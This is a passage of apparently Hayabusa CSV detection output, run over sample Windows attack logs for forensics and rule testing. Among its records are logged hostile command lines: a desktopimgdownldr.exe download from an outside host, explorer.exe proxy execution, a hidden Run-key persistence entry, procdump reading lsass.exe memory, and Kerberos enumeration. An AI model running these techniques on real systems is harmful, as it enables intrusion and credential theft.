747F3D96-F098-5EFE-0000-001012E13801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z 
/eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,../hayabusa-rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 
6661D424-F4F6-5EFE-0000-0010E7EFF800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: 
C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | 
PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 
+09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named 
Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: 
admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.885 
+09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account 
discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
